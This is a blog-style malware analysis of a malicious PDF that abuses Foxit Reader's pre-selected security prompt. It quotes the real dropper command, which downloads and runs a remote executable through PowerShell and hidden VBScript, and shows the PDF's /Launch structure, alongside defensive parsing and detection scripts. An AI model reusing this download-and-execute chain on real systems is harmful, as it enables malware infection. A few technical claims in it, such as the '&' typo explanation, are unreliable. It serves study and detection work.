Foxit Design Flaw Exploit-Technical Explanation of the malicious triggered command

Imène ALLOUCHE
May 22, 2024


Released By: Imène ALLOUCHE

To provide context for this article’s Proof of Concept (PoC) explanation, I recommend reading my previous article on the “Flawed Design Attack on Foxit PDF Reader”.

However, for those who prefer a brief refresher, here’s a concise breakdown of the Foxit PDF Reader Design Flaw Attack:

Quick Overview of Foxit Design Flaw Exploit

Cybersecurity researchers at Check Point have uncovered a campaign exploiting a vulnerability in Foxit Reader.

While most antivirus software wouldn’t detect this exploit (as it leverages a human element), Check Point managed to gather enough evidence to expose the attacker’s arsenal.

Here’s a breakdown of the key findings:

The Flaw in Foxit Reader: Malicious actors crafted booby-trapped PDFs that exploit a specific weakness in Foxit Reader. Unlike Adobe Reader, Foxit Reader displays pre-selected “OK” buttons in security warnings. This design flaw tricks unsuspecting users into granting permission for the PDF to execute hidden commands.

[Figure: Second malicious pop-up. Credits to Check Point]

PowerShell as a Weapon: These hidden commands utilize PowerShell, a built-in Windows scripting language, to download malware onto the victim’s machine. PowerShell’s versatility allows attackers to bypass traditional antivirus defenses.

A Diverse Arsenal: The downloaded malware belongs to various notorious families, including Agent Tesla (known for information stealing) and Remote Access Trojans (RATs) like NanoCore and Pony, which grant attackers complete control over the infected device.

Command Explanation

When the user clicks “OK” on the second pop-up, a malicious command is triggered. This command uses PowerShell, a built-in Windows scripting tool, to download a malicious file from a remote server and then execute it.

[Figure: Debugger showing the command triggered. Credits to Check Point]

And here is the command triggered:

C:\Windows\System32\cmd.exe /c cD  %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe', 'payload.exe')" >> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start payload.exe >> msd89h2j389uh.bat &@echo Set oShell = CreateObject ("Wscript.Shell") >> encrypted.vbs &@echo Dim strArgs >> encrypted.vbs &@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbs

Decoded Deception: A Technical Deep Dive into the Foxit Reader Exploit Command

The seemingly simple command used in the Foxit Reader exploit conceals a multi-step process designed to evade suspicion and execute malicious code. Let’s break down each section to understand its technical functionalities:

1. Initiating the Command Prompt:

  • C:\Windows\System32\cmd.exe /c: This part launches the Windows Command Prompt (cmd.exe) located in the System32 directory. The /c flag specifies that the following command will be executed and the command prompt window will then close.

2. Changing Directory:

  • cD %tEMP%: This command changes the current directory to the user's temporary folder (%TEMP%). Temporary folders are often used by malware to store downloaded files and scripts as they can be easily deleted later to avoid detection.

3. Downloading the Malicious Payload:

  • @echo powershell -Command "(New-Object Net.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe', 'payload.exe')" >> msd89h2j389uh.bat: This is the core of the malicious activity, the point where the exploit does its damage. Let’s break it down:
@echo
  • The leading @ suppresses the display of the command itself, so nothing appears in the command prompt window; echo then writes out the text that follows it.
powershell
  • This keyword invokes the PowerShell scripting engine.
-Command
  • This flag specifies the command to be executed by PowerShell.
(New-Object Net.WebClient).DownloadFile(...)
  • This creates a new instance of the Net.WebClient class, a .NET class available from PowerShell and used for downloading files from web servers.
hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe
  • This is the URL of the malicious file (likely malware) hosted on a compromised Discord server. The scheme is written as "hxxps" (defanged) so that the link cannot be clicked by accident.
payload.exe
  • This specifies the filename under which the downloaded malware will be saved on the victim's machine.
>> msd89h2j389uh.bat
  • This appends the echoed text to a file named msd89h2j389uh.bat, creating a batch file that holds the download command. The random-looking name gives no hint of the file's purpose, which makes it appear less suspicious.

4. Creating a Delayed Execution Batch File (msd89h2j389uh.bat):

  • The following lines:
@echo timeout /t 5 >> msd89h2j389uh.bat
&@echo start payload.exe >> msd89h2j389uh.bat

are appended to the msd89h2j389uh.bat file created in the previous step. Let's break them down:

  • @echo: Again, the @ suppresses the display of the command.
  • timeout /t 5: This command creates a five-second delay before executing the next command. This might be used by the attacker to give the impression that nothing is happening after the user clicks "OK" on the security warning.
  • start payload.exe: This line launches the downloaded malicious file (payload.exe).

5. Creating a VBScript for Persistence (encrypted.vbs):

  • The remaining lines:

&@echo Set oShell = CreateObject ("Wscript.Shell") >> encrypted.vbs
&@echo Dim strArgs >> encrypted.vbs
&@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs
&@echo oShell.Run strArgs, 0, false >> encrypted.vbs

create a VBScript file named encrypted.vbs. VBScript is another scripting language that can be used to automate tasks on Windows systems. Here's what each line does:

  • As before, the @ in @echo suppresses the display of the following commands.
  • Set oShell = CreateObject ("Wscript.Shell"): creates a new object based on the Wscript.Shell class, which allows the script to interact with the Windows shell and execute programs.
  • The subsequent lines (Dim strArgs and so on) define a variable named strArgs and assign a string value to it. This string value is the command that executes the batch file created earlier.
  • oShell.Run strArgs, 0, false uses the oShell object to execute the command stored in the strArgs variable. The additional parameters 0 and false set the window style (0 runs the command with a hidden window) and tell the script not to wait for the application to exit before continuing (false).
  • The VBScript file is then executed and deleted:
& encrypted.vbs
&dEl encrypted.vbs

Finally, the attacker attempts to delete the encrypted.vbs file after its execution. The “&” symbol before the “del” command is likely a typo, as VBScript doesn’t use “&” for command chaining; it should be replaced with a “call” statement to execute the “del” command within the script itself. Either way, the intended functionality is the same: deleting the evidence of the VBScript file.
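As an added example (my own code, not part of the original article or of Check Point's research), the following Python script statically replays the chained command explained above. It splits the cmd.exe /c string on its "&" separators, records every "@echo ... >> file" append so that the contents of msd89h2j389uh.bat and encrypted.vbs can be reconstructed on paper, and matches the behaviours described in this section as detection indicators. The command string is a copy of the one shown above with the URL kept defanged (hxxps); nothing is executed or downloaded.

```python
import re

# Copy of the command shown above (URL kept defanged as hxxps); used only as a string, never executed.
TRIGGERED_COMMAND = (
    'C:\\Windows\\System32\\cmd.exe /c cD  %tEMP% &@echo powershell -Command '
    '"(New-Object Net.WebClient).DownloadFile(\'hxxps://cdn.discordapp.com/attachments/'
    '1010643365152436226/1011056243474960515/Client_1.exe\', \'payload.exe\')" '
    '>> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat '
    '&@echo start payload.exe >> msd89h2j389uh.bat '
    '&@echo Set oShell = CreateObject ("Wscript.Shell") >> encrypted.vbs '
    '&@echo Dim strArgs >> encrypted.vbs '
    '&@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs '
    '&@echo oShell.Run strArgs, 0, false >> encrypted.vbs '
    '& encrypted.vbs &dEl encrypted.vbs'
)

CMD_PREFIX = re.compile(r'^\s*"?[^"]*?cmd(?:\.exe)?"?\s+/c\s+', re.IGNORECASE)
ECHO_APPEND = re.compile(r'^echo\s+(.*?)\s*>>\s*(\S+)$', re.IGNORECASE)

# Behaviours described in the breakdown above, expressed as indicators an analyst can match on.
INDICATORS = [
    ('download cradle (Net.WebClient.DownloadFile)', re.compile(r'Net\.WebClient.*?DownloadFile', re.I)),
    ('script file written via echo redirection', re.compile(r'>>\s*\S+\.(?:bat|cmd|vbs|js|ps1)\b', re.I)),
    ('WScript.Shell used to run a command', re.compile(r'WScript\.Shell', re.I)),
    ('delay before execution', re.compile(r'\btimeout\s+/t\s+\d+', re.I)),
    ('dropper deletes its own script', re.compile(r'\bdel\s+\S+\.vbs\b', re.I)),
]


def split_chain(command):
    """Split a 'cmd.exe /c ...' string on the '&' separators that sit outside double quotes."""
    m = CMD_PREFIX.match(command)
    body = command[m.end():] if m else command
    parts, current, in_quotes = [], [], False
    for ch in body:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == '&' and not in_quotes:
            parts.append(''.join(current).strip())
            current = []
        else:
            current.append(ch)
    parts.append(''.join(current).strip())
    return [p for p in parts if p]


def reconstruct_dropped_files(command):
    """Replay every 'echo <text> >> <file>' step on paper.

    Returns (files, other_steps): files maps each dropped file name to the lines it would
    contain; other_steps lists the remaining commands (directory change, script launch, delete)."""
    files, other_steps = {}, []
    for step in split_chain(command):
        step = step.lstrip('@')  # '@' only stops cmd from displaying the line; it is not part of the command
        m = ECHO_APPEND.match(step)
        if m:
            files.setdefault(m.group(2), []).append(m.group(1))
        else:
            other_steps.append(step)
    return files, other_steps


def triage(command):
    """Summarise a suspicious /c command: dropped files, direct steps and matched indicators."""
    files, other_steps = reconstruct_dropped_files(command)
    hits = [name for name, rx in INDICATORS if rx.search(command)]
    return {'dropped_files': files, 'other_steps': other_steps, 'indicators': hits}


if __name__ == '__main__':
    report = triage(TRIGGERED_COMMAND)
    for name, lines in report['dropped_files'].items():
        print(f'--- {name} ---')
        print('\n'.join(lines))
    print('other steps:', report['other_steps'])
    print('indicators:', report['indicators'])
```

Running the script prints the three-line batch file and the four-line VBScript exactly as the echo redirections would have written them, followed by the three direct steps (the cd into %TEMP%, the launch of encrypted.vbs and its deletion) and all five indicators. The same triage function can be pointed at any /P parameter or command-line field recovered from a PDF or from process telemetry.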

PDF file Static Analysis

This analysis goes into the technical details of a malicious PDF that exploits a design flaw in Foxit Reader. We’ll dissect the PDF structure and the embedded command, highlighting the attacker’s strategy and the vulnerability it leverages.

.\pdf-parser.py .\mlw.pdf
PDF Comment '%PDF-1.1\r\n'
obj 1 0
Type: /Catalog
Referencing: 2 0 R
<<
/OpenAction
<<
/S /Launch
/Win
<<
/F (CMD)
/P '(/c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile(\'hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe\', \'payload.exe\')"'
>>
msd89h2j389uh.bat &@echo timeout
/ t 5
>>
msd89h2j389uh.bat &@echo start payload.exe
>>
obj 2 0
Type: /Pages
Referencing: 3 0 R
<<
/Kids [ 3 0 R ]
/Count 1
/Type /Pages
>>
obj 3 0
Type: /Page
Referencing: 5 0 R, 2 0 R, 4 0 R
<<
/Resources
<<
/Font
<<
/F1 5 0 R
>>
>>
/MediaBox [ 0 0 795 842 ]
/Parent 2 0 R
/Contents 4 0 R
/Type /Page
>>
obj 4 0
Type:
Referencing:
Contains stream
<<
/Length 1260
>>
obj 5 0
Type: /Font
Referencing:
<<
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Type /Font
>>
xref
trailer
<<
/Size 6
/Root 1 0 R
/ID [(bc38735adadf7620b13216ff40de2b26)(bc38735adadf7620b13216ff40de2b26)]
>>
startxref 1866
PDF Comment '%%EOF'

Dissecting the PDF Structure:

Catalog Object (obj 1 0): This object serves as the central hub of the PDF’s structure. It contains references to various elements like pages, fonts, and, crucially, the /OpenAction dictionary.
OpenAction Dictionary: defines an automated action that executes upon opening the PDF. In this case, it holds the key to the exploit.

The Malicious Payload: Decoded

OpenAction Key: While innocuous, this key plays an important role in the attack. It references an embedded command that dictates the action to be taken when the PDF is opened.

Launch Action (/S /Launch): this key combination instructs Foxit Reader to launch an external application (/Launch), and the /Win dictionary provides the Windows-specific details for that application.

Application and Parameters (/F /P): these keys specify the target application (/F) and the parameters (/P) to be passed to it. In this case, the application is a command shell (CMD), and the parameters contain the complex command that leverages PowerShell for malicious activity.
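As an added example (my own code, not part of the article and not part of pdf-parser), the following Python script scans a PDF for /OpenAction entries, follows an indirect reference where one is used, and reports every /Launch action together with its /F and /P strings. It parses PDF literal strings as units, which matters here: in the pdf-parser output above, the /P string is cut at each ">>" redirection operator, because ">>" is also the token that closes a PDF dictionary. The three sample PDFs are constructed inline and the /P value in them is a harmless placeholder, not the real command.

```python
import re

# Constructed sample PDFs (not the real malicious file). The first mirrors the layout shown by
# pdf-parser above: /OpenAction -> /Launch -> /Win with /F and /P, but /P holds a harmless placeholder
# that deliberately contains '>>' to exercise the string-aware dictionary scanner.
LAUNCH_INLINE = (
    b"%PDF-1.1\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R\n"
    b"   /OpenAction << /S /Launch /Win << /F (CMD) /P (/c echo placeholder >> sample.bat) >> >> >>\n"
    b"endobj\ntrailer\n<< /Root 1 0 R >>\n%%EOF\n"
)
# The same action reached through an indirect reference, and a harmless /GoTo action for contrast.
LAUNCH_INDIRECT = (
    b"%PDF-1.1\n1 0 obj\n<< /Type /Catalog /OpenAction 4 0 R >>\nendobj\n"
    b"4 0 obj\n<< /S /Launch /F (notepad.exe) >>\nendobj\ntrailer\n<< /Root 1 0 R >>\n%%EOF\n"
)
BENIGN_GOTO = (
    b"%PDF-1.1\n1 0 obj\n<< /Type /Catalog /OpenAction << /S /GoTo /D [3 0 R /Fit] >> >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)


def read_literal_string(data, start):
    """Parse the PDF literal string whose '(' is at data[start]; return (bytes, index after ')').
    Nested parentheses are balanced and a backslash escapes the next byte (enough for \\( and \\))."""
    depth, i, out = 0, start, bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b'\\':
            out += data[i + 1:i + 2]
            i += 2
            continue
        if c == b'(':
            depth += 1
            if depth > 1:
                out += c
        elif c == b')':
            depth -= 1
            if depth == 0:
                return bytes(out), i + 1
            out += c
        else:
            out += c
        i += 1
    raise ValueError('unterminated literal string')


def read_dict(data, start):
    """Return the balanced '<< ... >>' dictionary starting at data[start]. Literal strings are
    skipped as units, so a '>>' inside /P (as in the real command) cannot end the dictionary early."""
    depth, i = 0, start
    while i < len(data):
        if data[i:i + 1] == b'(':
            _, i = read_literal_string(data, i)
            continue
        if data[i:i + 2] == b'<<':
            depth += 1
            i += 2
            continue
        if data[i:i + 2] == b'>>':
            depth -= 1
            i += 2
            if depth == 0:
                return data[start:i]
            continue
        i += 1
    raise ValueError('unterminated dictionary')


def resolve_object(data, num, gen):
    """Return the body of indirect object 'num gen obj ... endobj', or None if it is absent."""
    pattern = rb'(?<!\d)' + str(num).encode() + rb'\s+' + str(gen).encode() + rb'\s+obj(.*?)endobj'
    m = re.search(pattern, data, re.S)
    return m.group(1) if m else None


def find_launch_actions(data):
    """Return one finding per /OpenAction whose action type is /Launch, with /F and /P when present."""
    findings = []
    for m in re.finditer(rb'/OpenAction\s*', data):
        src, pos = data, m.end()
        ref = re.match(rb'(\d+)\s+(\d+)\s+R\b', data[pos:])
        if ref:  # indirect reference: follow it to the action object
            src = resolve_object(data, int(ref.group(1)), int(ref.group(2)))
            pos = src.find(b'<<') if src else -1
        if pos < 0 or src[pos:pos + 2] != b'<<':
            continue
        action = read_dict(src, pos)
        if not re.search(rb'/S\s*/Launch\b', action):
            continue
        finding = {'action': 'Launch'}
        for key in ('F', 'P'):
            km = re.search(rb'/' + key.encode() + rb'\s*\(', action)
            if km:
                value, _ = read_literal_string(action, km.end() - 1)
                finding[key] = value.decode('latin-1')
        findings.append(finding)
    return findings


if __name__ == '__main__':
    for label, pdf in (('inline', LAUNCH_INLINE), ('indirect', LAUNCH_INDIRECT), ('benign', BENIGN_GOTO)):
        print(label, find_launch_actions(pdf))
```

For a real file, read it in binary mode and pass the bytes to find_launch_actions; a non-empty result is a strong reason to quarantine the document before anyone opens it, whatever the reader on the workstation. The scanner deliberately works on the raw bytes rather than a decompressed object tree, so it will miss actions hidden inside object streams; a production check should decompress those first.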

The Flawed Design and Social Engineering:

The /OpenAction feature can be beneficial for automated tasks within PDFs. However, attackers exploit this functionality by embedding malicious commands that trigger upon opening the document.

The design flaw in Foxit Reader, which presents a pre-selected “OK” button for security warnings, makes it easier for attackers to trick unsuspecting users into clicking through the prompts, ultimately granting permission for the malicious command to execute.

Technical Nuances:

The embedded command leverages PowerShell, a scripting language built into Windows, to download a malicious file from a remote server. This technique allows attackers to bypass traditional antivirus solutions that may not be configured to detect malicious PowerShell scripts.

The attackers obfuscated the script within the /P parameter using techniques like variable renaming or encoding to hinder analysis and detection.

Comparison with Adobe Reader:

/Launch Specificity: It’s important to note that the /Launch key might not be universally supported by all PDF readers. While it triggers the exploit in Foxit Reader, Adobe Reader is not susceptible to this specific attack because of how it implements the /OpenAction functionality.

Mitigations of the Threats:

  • Nothing beats educating users about social engineering tactics and the importance of scrutinizing security warnings before clicking any button.
  • Consider using a PDF reader that is not vulnerable to this specific exploit in Foxit Reader. Adobe Reader has so far proven to be the more secure option among PDF readers, so consider using it instead.
  • Use antivirus solutions that can detect and block malicious file downloads initiated by PowerShell scripts.
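As an added example on the detection side (my own code, not from the article or from any vendor), the following Python script applies a lineage-based rule to process-creation telemetry: a PDF reader spawning a script host (cmd.exe, powershell.exe, wscript.exe and similar) is alerted on regardless of the command line, and command-line signals from this article (a download cradle, script files written with ">>", a hidden-window Run) raise the alert's reason list. The events are constructed Sysmon-style JSON lines that model the chain described above; the process names for Foxit and Adobe, and the FoxitUpdater.exe child in the last event, are assumptions to adjust to your own software inventory.

```python
import json
import re

# Constructed Sysmon-style process-creation events (JSON lines), not real telemetry. The first three
# model the chain from this article: Foxit Reader -> cmd.exe -> wscript.exe -> payload.exe in %TEMP%.
# The last event uses an assumed updater process name to show that not every Foxit child is flagged.
SAMPLE_EVENTS = r'''
{"ts": "2024-05-22T10:01:02Z", "host": "WS01", "ParentImage": "C:\\Program Files (x86)\\Foxit Software\\Foxit Reader\\FoxitReader.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c cD %tEMP% &@echo powershell -Command \"(New-Object Net.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe', 'payload.exe')\" >> msd89h2j389uh.bat &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbs"}
{"ts": "2024-05-22T10:01:03Z", "host": "WS01", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\alice\\AppData\\Local\\Temp\\encrypted.vbs\""}
{"ts": "2024-05-22T10:01:09Z", "host": "WS01", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\payload.exe", "CommandLine": "payload.exe"}
{"ts": "2024-05-22T10:05:00Z", "host": "WS02", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c dir"}
{"ts": "2024-05-22T10:06:00Z", "host": "WS02", "ParentImage": "C:\\Program Files (x86)\\Foxit Software\\Foxit Reader\\FoxitReader.exe", "Image": "C:\\Program Files (x86)\\Foxit Software\\Foxit Reader\\FoxitUpdater.exe", "CommandLine": "FoxitUpdater.exe /check"}
'''

# Process names are assumptions; extend them to match the readers deployed in your environment.
PDF_READERS = re.compile(r'\\(?:FoxitReader|FoxitPDFReader|AcroRd32|Acrobat)\.exe$', re.I)
SCRIPT_HOSTS = re.compile(r'\\(?:cmd|powershell|pwsh|wscript|cscript|mshta)\.exe$', re.I)
TEMP_SCRIPT = re.compile(r'\\AppData\\Local\\Temp\\[^"\s]+\.(?:vbs|js|bat|cmd|ps1)\b', re.I)
TEMP_EXE = re.compile(r'\\AppData\\Local\\Temp\\[^\\]+\.exe$', re.I)
CMDLINE_SIGNALS = [
    ('download-cradle', re.compile(r'DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b', re.I)),
    ('script-dropped-via-echo', re.compile(r'>>\s*\S+\.(?:bat|cmd|vbs|js|ps1)\b', re.I)),
    ('hidden-window-run', re.compile(r'\.Run\s+\S+,\s*0\b|-w(?:indowstyle)?\s+hidden', re.I)),
]
# Any one of these is enough to alert on its own; command-line signals need two to alert alone.
STRONG = {'pdf-reader-spawned-script-host', 'script-host-ran-temp-script', 'exe-launched-from-temp'}


def score_event(ev):
    """Return the list of reasons an event matches, strongest (lineage/location) first."""
    image, parent, cmdline = ev['Image'], ev['ParentImage'], ev.get('CommandLine', '')
    reasons = []
    if PDF_READERS.search(parent) and SCRIPT_HOSTS.search(image):
        reasons.append('pdf-reader-spawned-script-host')
    if SCRIPT_HOSTS.search(image) and TEMP_SCRIPT.search(cmdline):
        reasons.append('script-host-ran-temp-script')
    if TEMP_EXE.search(image):
        reasons.append('exe-launched-from-temp')
    for name, rx in CMDLINE_SIGNALS:
        if rx.search(cmdline):
            reasons.append(name)
    return reasons


def detect(jsonl):
    """Evaluate JSON-lines process events and return the alerts the rule produces."""
    alerts = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        reasons = score_event(ev)
        if STRONG & set(reasons) or len(reasons) >= 2:
            alerts.append({'ts': ev['ts'], 'host': ev['host'], 'image': ev['Image'], 'reasons': reasons})
    return alerts


if __name__ == '__main__':
    for alert in detect(SAMPLE_EVENTS):
        print(alert['ts'], alert['host'], alert['image'], ', '.join(alert['reasons']))
```

On the sample data the rule fires three times, once for each stage of the chain on WS01, and stays silent for the ordinary cmd.exe /c dir on WS02 and for the assumed updater process launched by Foxit Reader. The lineage rule is the important one: it would have fired on the first event even if the attacker had changed every string in the command line, which is the behaviour an antivirus signature on DownloadFile alone cannot offer.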


Imène ALLOUCHE

1CS student at ESI Algiers, CTF player and Cybersecurity enthusiast